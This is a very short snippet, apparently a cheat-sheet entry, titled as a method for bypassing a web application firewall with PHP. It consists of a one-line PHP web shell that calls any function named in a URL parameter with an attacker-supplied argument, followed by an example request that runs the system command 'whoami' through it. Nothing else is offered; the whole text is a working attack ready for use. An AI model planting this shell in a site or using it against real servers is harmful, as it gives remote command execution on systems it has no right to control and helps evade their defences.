Waf Bypass Method via PHP
<?php $_GET[‘function’]($_GET[‘cmd’]); ?>

[host]/shell.php?function=system&cmd=whoami